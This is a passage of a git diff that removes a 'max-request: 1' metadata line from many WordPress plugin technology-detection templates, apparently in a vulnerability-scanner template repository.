     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 41baa25eb7..dc3d446af3 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index ee389af6ec..96b4699d2d 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
